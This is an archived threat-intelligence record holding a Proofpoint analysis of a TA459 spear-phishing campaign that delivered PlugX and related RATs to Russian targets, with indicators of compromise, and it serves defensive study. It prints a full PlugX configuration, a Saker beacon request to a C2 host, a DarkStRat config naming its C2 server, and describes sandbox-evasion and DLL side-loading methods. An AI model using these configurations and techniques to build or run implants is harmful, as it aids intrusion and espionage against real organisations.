{ "id": "8971a112-c136-4ca2-9b95-8fbf28dc4b69", "created_at": "2026-04-06T00:09:21.451961Z", "updated_at": "2026-04-10T13:12:04.44326Z", "deleted_at": null, "sha1_hash": "0a0c97b21075f4588f10503ae1c26a4685e061d1", "title": "Targeted Attack Distributes PlugX in Russia | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 358510, "plain_text": "Targeted Attack Distributes PlugX in Russia | Proofpoint US\r\nBy September 15, 2015 Thoufique Haq \u0026 Aleksey F\r\nPublished: 2015-09-15 · Archived: 2026-04-05 18:25:25 UTC\r\nBy Thoufique Haq \u0026 Aleksey Fn\r\nProofpoint researchers recently observed a campaign targeting telecom and military in Russia. Beginning in July\r\n2015 (and possibly earlier), the attack continued into August and is currently ongoing. As a part of this campaign,\r\nwe also observed attacks on Russian-speaking financial analysts working at global financial firms and covering\r\ntelecom corporations in Russia, likely a result of collateral damage caused by the attackers targeting tactics. \r\nThe attacks employed PlugX malware, a Remote Access Trojan (RAT) widely used in targeted attacks. Proofpoint\r\nis tracking this attacker, believed to operate out of China, as TA459 . This same attacker is also reported to have\r\ntargeted various military installations in Central Asia in the past [1]. While the current campaign from this attacker\r\nhas been active for a couple of months, there is evidence of activity by this attacker as far back as 2013,\r\nemploying other backdoors such as Saker, Netbot and DarkStRat .\r\nThe attacks seen in the current campaign involved spear-phishing emails that employ both exploit-laden Microsoft\r\nWord document attachments, as well as links leading to RAR archives. The email contents, filenames and decoy\r\nare all usually in Russian.\r\nPlugX Malware Analysis\r\n1. PlugX Campaign Details: Attachments\r\nThe Microsoft Word document attachments observed in this campaign utilized CVE-2012-0158 to exploit the\r\nclient and implant the PlugX RAT. For example, the attachment LTE-2600.doc (SHA:\r\n6ea86b944c8b5a9b02adc7aac80e0f33217b28103b70153710c1f6da76e36081) was sent to financial analysts\r\ncovering the telecom industry with the email Subject “Проект бизнес-плана” (“Project business-plan”). The\r\nattachment name is suited to the targets because “LTE” is a telecom term referring to Long-Term Evolution\r\nnetworks, typically used to describe 4G networks.\r\nInspection of the document exploit employing CVE-2012-0158 also revealed that it was crafted using a builder\r\ntool, which can be seen in various artifacts visible in the document properties. (Fig.1) However, it should be noted\r\nthat we do not believe that this builder is exclusively used by this attacker and is likely shared among multiple\r\nthreat actor groups.\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 1 of 13\n\nFigure 1: Builder artifacts in exploit document\r\n2. Campaign Details: URLs\r\nAs a part of this PlugX campaign, the attackers also sent spear-phishing emails with URLs to RAR archive files\r\nhosted on fake domains registered for this campaign. An interesting fact that shines some light on the social\r\nengineering tradecraft used by the group is that these domain names as well as payload file names were not chosen\r\nat random, as is often the case, but were instead chosen to fit the specific lure.\r\nFor example, the RAR archive hosted on www.forum-mil[.]net/news/2015-08-03-3001.rar contained the\r\nexecutable file \"Воздушно-космические силы России заступили на боевое дежурство.exe” (“Aerospace\r\nRussian forces step up military duty.exe”). Additional searching uncovered a news article with this title on a\r\nlegitimate Russian-language news site: http://www.forum-mil.ru/news/vozdushno_kosmicheskie_sily_rossii_zastupili_na_boevoe_dezhurstvo/2015-08-03-3001: the\r\nmalicious executable borrowed the name from the article title, and the site to host the malware mimics the site that\r\nhosts the news article.\r\nIn another example, the news article http://tvzvezda.ru/news/forces/content/201508191459-88tq.htm was used as\r\nthe basis for registering the payload hosting site www[.]tvzvezda[.]net/news/forces/content/201508181025.rar.\r\nAgain, the title of the article was used as the name for the executable inside the RAR archive, and it appears that\r\nmany of these lures were created in a similar fashion. Specifically, the actor starts with an article describing a\r\nmilitary-related event and then registers a payload site and names the malware file. Table 1 shows the full list of\r\npayload domains and sites they mimic. (A list of the payload URLs can be found in the Indicators of Compromise\r\nsection at the end of this post.)\r\nInfection Site Registrant Email Legitimate Site Mimicked\r\narms-expo[.]net gengd@gmail.com arms-expo[.]ru (Russian information agency on weapons)\r\nforum-mil[.]net gengd@gmail.com\r\nforu-mil[.]ru (Forum of the Ministry of Defense of Russian\r\nFederation)\r\ntvzvezda[.]net hsdf@gmail.com\r\ntvzvezda.ru (TV network run by Russian Ministry of\r\nDefense)\r\nrusarmy[.]net dolphin@yahoo.com rusarmy[.]com (Russian army and its weapons forum)\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 2 of 13\n\nInfection Site Registrant Email Legitimate Site Mimicked\r\npatriotp[.]com dolphin@yahoo.com patriotp[.]ru (Russian military patriot recreation park)\r\nmilitarynewes[.]com gjklsdf@gmail.com militarynews[.]com (US military news portal)\r\nTable 1: Details on domains hosting malicious RAR-archived PlugX executables\r\nAll the infection domains and command and control (C2) domains were registered using the same registrar in\r\nBeijing: “Shanghai Meicheng Technology Information Development Co., Ltd.”. Other than the emails, the\r\ninformation used for registration was randomized.\r\nThe RAR archives hosted on fake domains contained RAR SFX (self-extracting executable) packaged executables\r\nwhich drop and load PlugX. Proofpoint researchers observed the following filenames being used for executables\r\nin the campaign:\r\nEmbedded Filename Translated\r\nСМИ -расчет рассылки новый.scr Mass Media - Calculation of new distribution.scr\r\nВ России сформирована легендарная 6-я\r\nЛенинградская армия ВВС и ПВО.scr\r\nIn Russia, a legendary 6-th Leningrad army VVS and\r\nPVO is formed.scr\r\nСамая мощная ядерная бомба в\r\nистории.scr\r\nStrongest nuclear bomb in history.scr\r\nПамятные мероприятия, в связи с 15-\r\nлетием гибели АПРК «Курск».exe\r\nCommemorative events in connection with the 15th\r\nanniversary of the sinking of nuclear submarine\r\n“Kursk”.exe\r\nСМИ.scr Mass Media.scr\r\nВоздушно-космические силы России\r\nзаступили на боевое дежурство.exe\r\nAerospace Russian forces step up military duty.exe\r\n \r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 3 of 13\n\n11.08.2015.scr N/A\r\nTable 2: Filenames of executables inside RAR archives\r\n2.1. Decoy Content and Sandbox Evasion\r\nInterestingly, one of the RAR SFX droppers (SHA:\r\n71be8bb45dfe360ee6076ed34fde12a382fe9d7922bd11b179ca773be12fa54c) launches a decoy Microsoft Word\r\ndocument before launching the executable. (Fig 2) The contents of this decoy document reference the “Tsar\r\nBomba” nuclear test from the Cold War era and have been directly lifted from a Russian site.\r\nFigure 2: Contents of decoy document referencing “Tsar Bomba”\r\nIn addition to displaying something potentially relevant to the recipient’s interests, the PlugX payload is not\r\nexecuted by the RAR SXF until the victim closes the decoy Word document, seen in the past as a sandbox evasion\r\ntechnique wherein the payload is not executed until the decoy document is closed. As a result, the actual payload\r\nmay never execute in malware sandbox environments unless the sandbox is configured to simulate the action of a\r\nuser closing the decoy document. The SFX script for this document (Fig. 3) appears to have been created with a\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 4 of 13\n\nChinese language pack version of WinRAR. The decoy document “1.doc” is executed first and waits until it is\r\nclosed before launching “0810.exe”. This effect can be easily achieved in WinRAR by setting the “Wait and return\r\nexit code” option when creating the SFX archive.\r\nFigure 3: RAR SFX script \r\n3. PlugX Implant\r\nThe attachment and email campaigns both employed DLL side-loading techniques to load the PlugX payload. All\r\nof the payloads used the same clean signed executable “fsguidll.exe”, masquerading as the F-secure GUI\r\ncomponent, to sideload “fslapi.dll” which in turn unpacks code from “fslapi.dll.gui”.\r\nFigure 4: DLL sideloading masquerading as the F-secure GUI component\r\nThe variant of PlugX used is the P2P version that was described by JPCert [2]. A sample configuration extracted\r\nusing the volatility script from Arbor [3] is shown below.\r\nPlugX Config (0x36a4 bytes):\r\n Hide Dll: -1\r\n Keylogger: -1\r\n Sleep1: 167772160\r\n Sleep2: 0\r\n Cnc: www.pressmil[.]com:80 (HTTP / UDP)\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 5 of 13\n\nCnc: www.pressmil[.]com:80 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:80 (UDP)\r\n Cnc: www.pressmil[.]com:443 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:443 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:443 (UDP)\r\n Cnc: www.pressmil[.]com:53 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:53 (UDP)\r\n Cnc: www.pressmil[.]com:53 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:995 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:995 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:995 (UDP)\r\n Persistence: Service + Run Key\r\n Install Folder: %AUTO%\\ucP\r\n Service Name: sWtDmsuBTyMK\r\n Service Display Name: sWtDmsuBTyMK\r\n Service Desc: Windows sWtDmsuBTyMK Service\r\n Reg Hive: HKCU\r\n Reg Key: Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n Reg Value: gGIHBgytn\r\n Injection: 1\r\n Inject Process: %ProgramFiles(x86)%\\Windows Media Player\\wmplayer.exe\r\n Inject Process: %windir%\\system32\\winlogon.exe\r\n Inject Process: %windir%\\explorer.exe\r\n Inject Process: %windir%\\system32\\svchost.exe\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 6 of 13\n\nUac Bypass Injection: 1\r\n Uac Bypass Inject: %windir%\\system32\\msiexec.exe\r\n Uac Bypass Inject: %windir%\\system32\\rundll32.exe\r\n Uac Bypass Inject: %windir%\\explorer.exe\r\n Uac Bypass Inject: %windir%\\system32\\dllhost.exe\r\n Plugx Auth Str: TEST\r\n Cnc Auth Str: LLL-0808\r\n Mutex: Global\\IUNJCCvywXlrisLlcBhqGm\r\n Screenshots: 0\r\n Screenshots Sec: 10\r\n Screenshots Zoom: 50\r\n Screenshots Bits: 16\r\n Screenshots Qual: 50\r\n Screenshots Keep: 3\r\n Screenshot Folder: %AUTO%\\FS\\screen\r\n Enable Tcp P2P: 1\r\n Tcp P2P Port: 1357\r\n Enable Udp P2P: 1\r\n Udp P2P Port: 1357\r\n Enable Icmp P2P: 1\r\n Icmp P2P Port: 1357\r\n Enable Ipproto P2P: 1\r\n Ipproto P2P Port: 1357\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 7 of 13\n\nEnable P2P Scan: 1\r\n P2P Start Scan1: 0.0.0.0\r\n P2P Start Scan2: 0.0.0.0\r\n P2P Start Scan3: 0.0.0.0\r\n P2P Start Scan4: 0.0.0.0\r\n P2P End Scan1: 0.0.0.0\r\n P2P End Scan2: 0.0.0.0\r\n P2P End Scan3: 0.0.0.0\r\n P2P End Scan4: 0.0.0.0\r\n Mac Disable: 00:00:00:00:00:00\r\nMany of the samples used the string “EEEEEE” for authentication of the C2 communication, which is likely the\r\ndefault value. Other observed values include “LLL-0808”, “0abcde”, and “niii-0701”.\r\n4. Command and Control Infrastructure\r\nWe observed pressmil[.]com and notebookhk[.]net being used as the C2 servers for this specific campaign. Over\r\nthe duration of the campaign both of these domains pointed to the same infrastructure on the IP address\r\n“43.252.175.119” in Hong Kong. This IP infrastructure has been actively used by this attacker as early as 2014-\r\n12-04. The other domains also registered to point to this same IP address include “fedpress[.]net” and\r\n“dicemention[.]com”, which have been observed at use in past campaigns.\r\nIn addition, the C2 server notebookhk[.]net pointed to 123.254.104.50 multiple times between 2013-08-23  and\r\n2014-09-29. Similarly dicemention[.]com pointed to this IP multiple times between 2013-12-05 and 2014-09-28.\r\nThere were multiple domains that used this same IP infrastructure 123.254.104.50 in the past such as\r\nbusiness-isa.mynetav[.]org\r\nbusiness-rsa.onmypc[.]org\r\nblacktan[.]cn\r\ndicemention[.]com\r\nleeghost[.]com\r\nnotebookhk[.]net\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 8 of 13\n\nWhen investigating 123.254.104.50 we discovered additional, older payloads clustering in to three different\r\nmalware families. These additional malware families used by this attacker in the past were Saker, Netbot and\r\nDarkStRat. Researchers at ESET also reported and documented the usage of DarkStRat by this attacker [1].\r\n44.1. Related Malware: Saker (aka XBox) implant\r\nThe samples from the Saker cluster exhibited clues that also point to a Russian military attack nexus. For example,\r\nthe file “zamysel praticteskih dejstvi voisk.scr” (SHA:\r\n556e7e944939929ca4d9ca6c54d9059edf97642ece1d84363f2d46e2e8ca72ae), translates to “plan of army practice\r\nmaneuvers.scr”. It was also similarly packaged in a RAR archive, and on execution it drops and loads a DLL file\r\n“icwnet.dll” (SHA: 1a789568a53c18dab21c9c0386c746878cf8458e3369f0dc36a285fe296f3be3) which contains\r\nthe exports “ServiceMain” and “JustTempFun”. The malware makes the following beacon to a remote server:\r\nGET /30106C07000038FE0F00\u003cremoved\u003e0000000000000000000000000000000000000000000000000000000000000000000\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: www.leeghost.com:1037\r\nCache-Control: no-cache\r\nThis backdoor has been analyzed extensively in the past [4] and provides the attacker a range of functionality,\r\nincluding file manager (enumerate, create, copy, move, delete); the ability to download and run secondary\r\npayloads; and deleting all traces of itself and shutting down.\r\n4.2. Related Malware: Netbot (aka TornRat) Implant\r\nWhen an example payload (SHA: 277fe4dab731149f3d40630f2f8b25092b007c701f04b5304d3ba9570280d015)\r\nfrom this cluster is detonated, it drops and loads a DLL file “taskhost.dll” (SHA:\r\ndd9d31c3acb4299619c2251698024da1ac9ec42280aa6c16cd2369907f3be4e3). The malware sends an initial\r\nbeacon to its C2 server (Fig. 5), which matches the TornRAT network signature previously published by\r\nCrowdStrike [5].\r\nFigure 5: Netbot network beacon\r\nThe scheme used to encrypt the beacon is a byte XOR with 0x3f followed by an addition with 0x3f. The encrypted\r\nbeacon contains hostname, system memory, OS information and infection timestamp. (Fig. 6)\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 9 of 13\n\nFigure 6: Netbot network beacon decoded\r\nSamples from this cluster were found creating the following mutexes.\r\nWinlogin Running!\r\nNetbot2012 Is Running!\r\nNetBotServer Is Running!\r\nIt is worth noting that there is similarity in mutex naming scheme to another malware family called NetTraveler\r\n(aka Travnet). Netbot is a backdoor and has commands to support features similar noted above for Saker, such as\r\nfile manager (enumerate, create, copy, move, delete), ability to download and execute secondary payloads; and\r\ndeleting all traces of itself.\r\n4.3. Related Malware: DarkStRat implant\r\nWhen an example payload (SHA: b38aa09a2334e11a73ef9a926694f2054789934daa38afeb8d00bce6949b6c4c)\r\nfrom this cluster is detonated it drops and runs an executable file “netlink.exe” (SHA:\r\nb38aa09a2334e11a73ef9a926694f2054789934daa38afeb8d00bce6949b6c4c). The RAT sends the string \"ok\\n\"\r\nfollowing initial beacon to a remote server. A configuration file “netsetting.ini” is also written to disk with the\r\nfollowing contents:\r\n[Option]\r\nHostPort=443\r\nHostName=www.dicemention.com\r\nDarkStRat is a full-fledged RAT written in Delphi with an array of features such as file manager, process manager,\r\nregistry manager, service manager, downloading and running secondary payloads and deleting all traces of itself.\r\nAs also noted by the ESET researchers [1], the strings in this RAT strangely show Spanish language origins, albeit\r\nwith some Chinese connections. The source code for this RAT is hosted on google code with the name “DarkStRat\r\n2008 1.0开源.rar”. The string “开源.” in the name translates to “Open Source”.  Various parts of the source code\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 10 of 13\n\nalso have strings in Chinese and reference “darkst[.]com” and “fsg2[.]cn”. The owner of this Google-hosted code\r\nproject is listed as darkteam...@gmail.com. As a result, it can be inferred that code from a Spanish RAT was\r\nrepurposed by malware author with Chinese origins and marketed as DarkStRat, but as is often the case we should\r\ncaution against a definitive attribution based solely on characteristics such as language and C2 server locations.\r\n5. PlugX Malware Campaign Conclusion\r\nA detailed examination of this operation reveals an adversary who demonstrates a keen interest in Russian telecom\r\nand military sectors, indicative of an actor with geopolitical motives. The attacker adapts and evolves their Tactics,\r\nTechniques and Procedures (TTPs) over time as the situation demands. While the attacker appears to do very little\r\nto hide their tracks, they remain highly determined and persistent and have carried out attacks through a sustained\r\noperation spanning at least two years, and possibly longer. The attacker also invests time to research the locale and\r\ncurrent events relevant to their targets and then leverages this in their targeting tactics. Attacks such as these have\r\nbecome a constant occurrence given the covert nature of digital attacks and easy access to targeting information\r\nonline.\r\nAs this threat shows, attackers continue to employ increasingly sophisticated techniques against new targets in\r\norder to uncover and steal sensitive information. Organizations need to recognize that they cannot rely on\r\ntraditional antivirus and anti-spam solutions to detect and stop these advanced threats. In order to combat targeted\r\nattacks, organizations should adopt next-generation solutions that make it possible to identify and respond to\r\nsophisticated targeted attacks by correlating advanced detection with threat intelligence about actor TTPs and\r\nglobal views of threat traffic, including IOCs that enable response teams to quickly detect and mitigate\r\ncompromises. Moreover, a multi-layer approach is essential, with email security representing the logical starting\r\npoint for an advanced threat defense: like this targeted attack, email remains the vector-of-choice for penetrating\r\ntarget organizations and delivering these sophisticated payloads.\r\nIndicators of Compromise (IOCs)\r\nPlugX Infection URLs:\r\n[hxxp://www.arms-expo[.]net/news/content/387206.rar]\r\n[hxxp://arms-expo[.]net/news/content/day_2015-08-20.rar]\r\n[hxxp://arms-expo[.]net/news/samaia_mochnaia_iagernaia_bomba_v_istorii.rar]\r\n[hxxp://www.arms-expo[.]net/news/content/20150818.rar]\r\n[hxxp://www.tvzvezda[.]net/news/forces/content/201508181025.rar]\r\n[hxxp://www.arms-expo[.]net/news/content/20150818.zip]\r\n[hxxp://www.arms-expo[.]net/news/content/Day_2015-08-20.rar]\r\n[hxxp://www.arms-expo[.]net/news/content/VTC.rar]\r\n[hxxp://www.rusarmy[.]net/forum/vvs/modernizirovanoj.rar]\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 11 of 13\n\n[hxxp://www.rusarmy[.]net/forum/threads/sostojanie-krejserov-proekta-1144.9.rar]\r\n[hxxp://www.forum-mil[.]net/news/2015-08-03-3001.rar]\r\n[hxxp://www.militarynewes[.]com/news/11.08.2015.rar]\r\nPlugX hashes (SHA256):\r\n1aa6c5d0c9ad914fb5ed24741ac947d31cac6921ece7b3b807736febda7e2c4b\r\n1b32825f178afe76e290c458ddbf8a3596002c6f9a7763687311f7d211a54aab\r\n3e824972397b322ea9f48fd1a9a02bd6c3eb68cc7de3a4f29e46a5c67b625ec1\r\n49e1f953dc17073bf919972868576b93cc9f3b5b9600f98a0bd9e39e5d229d9e\r\n4cadbdb5a09781555cc5d637d3fecf89b9a66fac245d6a3a14989f39a9a48c6e\r\n67cccfa23a7fd1d9ca8160cd977d536c4a40bf9525a93aa4122a89527a96fa8f\r\n6ea86b944c8b5a9b02adc7aac80e0f33217b28103b70153710c1f6da76e36081\r\n7efcf2211cd68ab459582594b5d75c64830acf25bcaab065bbd60377fb9eb22a\r\n8702506e8e75834a8f011cfc268d02043af5522aeda20a8458880c8fbed7ecac\r\n8a5df5f31a3b4f893a0565967d64e57f41d91e3592bbd8d52f98f81b3fb8452b\r\nSaker hashes (SHA256):\r\n556e7e944939929ca4d9ca6c54d9059edf97642ece1d84363f2d46e2e8ca72ae\r\n0d2600d978f5c1042e93b701654db080aac144dfa2877844334b1d4cd78f4a1d\r\n2a6dee57cb302a1350ade4a33f40a77c1952cf2e6b29d1be8400c13927e34670\r\n383c5d22c1de3aae7684eb5a7d87d6b553f09f166ca402894c5deecabaa7d866\r\n53d29782b8c325c2ff62493cdb261a8e54e45ed04880527e75e8e211b4d8d861\r\n5d97ec30c481e00d4285246b528745f331be905f453e062bd9c2d506e9386f0e\r\n664f80b427bf0145e62f6f90cb4833c30cfb8dc4b2d68746aa01420da82bd8af\r\n6dc560a3b20a6e95552254bdb04fba03f74223a83a58436a3decfab74abc5fb5\r\na2f4aa2d25bff21e73b15065e2fc38d297ee14253044a66d00690b1bb23fc373\r\nc7d7211d1fea69ea6a9697a8f8d21ac40f6d7dc6863708b9a98930271a156c86\r\nd2a5cf434e8a0c63c23e6a3e5cf8a60f259099a706d2d243ffa5c7dbd46fd9d4\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 12 of 13\n\nd6ff406da6e9a20074c3e1228ab04d35a3839b1719d3cafbb21ad3e3b6d03ef4\r\ndf4571b7d3be63de8338e6905b2689309ed5cce88d57a8db0c7b9aebf713d81c\r\ned7771339794c7908865f7816513b593369a93c98b39f58ebaaa98f3f0067e9d\r\nNetbot hashes (SHA256):\r\n4524ede160d5476211e99329768b38abd88aacb6fa9334f2c2bbcaab9b0438f5\r\n317e9deef23ff0e919083ac6c94b5ccd3bb0227f674078d66cdd4a2e5d1ebba9\r\n68a98b8e174cb5af20e0ac97978bad6d245a1cb0970b82a4a269a92e7726d74b\r\n277fe4dab731149f3d40630f2f8b25092b007c701f04b5304d3ba9570280d015\r\nf95c6749f4d4fae18f9d384f495dc1c79e7484b309d0d35ea68966763ed325bd\r\nDarkStRat hashes (SHA256):\r\nb38aa09a2334e11a73ef9a926694f2054789934daa38afeb8d00bce6949b6c4c\r\n0d219aa54b1d417da61bd4aed5eeb53d6cba91b3287d53186b21fed450248215\r\nC2 domains observed:\r\npressmil[.]com\r\nnotebookhk[.]net\r\ndicemention[.]com\r\nleeghost[.]com\r\nReferences:\r\n[1] http://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/\r\n[2] http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html\r\n[3] https://github.com/arbor-jjones/volatility_plugins\r\n[4]http://blog.crowdstrike.com/whois-anchor-panda/\r\nSource: https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia" ], "report_names": [ "PlugX-in-Russia" ], "threat_actors": [ { "id": "7041fcf5-b34d-47c3-be4c-3c40f243af89", "created_at": "2023-01-06T13:46:38.611261Z", "updated_at": "2026-04-10T02:00:03.038745Z", "deleted_at": null, "main_name": "TA459", "aliases": [ "G0062" ], "source_name": "MISPGALAXY:TA459", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "808d8d52-ca06-4a5f-a2c1-e7b1ce986680", "created_at": "2022-10-25T16:07:23.899157Z", "updated_at": "2026-04-10T02:00:04.782542Z", "deleted_at": null, "main_name": "NetTraveler", "aliases": [ "APT 21", "Hammer Panda", "NetTraveler", "TEMP.Zhenbao" ], "source_name": "ETDA:NetTraveler", "tools": [ "Agent.dhwf", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "NetTraveler", "Netfile", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "TravNet", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "0bf35542-9ebc-44a9-b319-b6df0bee4bac", "created_at": "2022-10-25T15:50:23.437853Z", "updated_at": "2026-04-10T02:00:05.36762Z", "deleted_at": null, "main_name": "TA459", "aliases": [ "TA459" ], "source_name": "MITRE:TA459", "tools": [ "gh0st RAT", "NetTraveler", "PlugX", "ZeroT" ], "source_id": "MITRE", "reports": null }, { "id": "802552ac-1f16-4b85-8d78-76d683684124", "created_at": "2022-10-25T16:07:24.28032Z", "updated_at": "2026-04-10T02:00:04.920517Z", "deleted_at": null, "main_name": "TA459", "aliases": [ "G0062" ], "source_name": "ETDA:TA459", "tools": [ "Agent.dhwf", "AngryRebel", "Destroy RAT", "DestroyRAT", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "NetTraveler", "Netfile", "PCRat", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "TravNet", "Xamtrav", "ZeroT" ], "source_id": "ETDA", "reports": null }, { "id": "c6604303-a1c8-4e59-ba12-5da5c0bc6877", "created_at": "2023-01-06T13:46:38.312359Z", "updated_at": "2026-04-10T02:00:02.923025Z", "deleted_at": null, "main_name": "APT14", "aliases": [ "ANCHOR PANDA", "QAZTeam" ], "source_name": "MISPGALAXY:APT14", "tools": [ "Backdoor.Win32.PoisonIvy", "Gen:Trojan.Heur.PT", "Torn RAT", "Anchor Panda", "Gh0st Rat", "Gh0stRat, GhostRat", "Poison Ivy" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "25a38dea-d23b-479b-9548-024e955b8964", "created_at": "2022-10-25T16:07:23.305911Z", "updated_at": "2026-04-10T02:00:04.533448Z", "deleted_at": null, "main_name": "Anchor Panda", "aliases": [ "APT 14", "Anchor Panda", "QAZTeam" ], "source_name": "ETDA:Anchor Panda", "tools": [ "AngryRebel", "Chymine", "Darkmoon", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Moudour", "Mydoor", "PCRat", "Poison Ivy", "SPIVY", "Torn RAT", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "254f2fab-5834-4d90-9205-d80e63d6d867", "created_at": "2023-01-06T13:46:38.31544Z", "updated_at": "2026-04-10T02:00:02.924166Z", "deleted_at": null, "main_name": "APT21", "aliases": [ "HAMMER PANDA", "TEMP.Zhenbao", "NetTraveler" ], "source_name": "MISPGALAXY:APT21", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434161, "ts_updated_at": 1775826724, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0a0c97b21075f4588f10503ae1c26a4685e061d1.pdf", "text": "https://archive.orkl.eu/0a0c97b21075f4588f10503ae1c26a4685e061d1.txt", "img": "https://archive.orkl.eu/0a0c97b21075f4588f10503ae1c26a4685e061d1.jpg" } }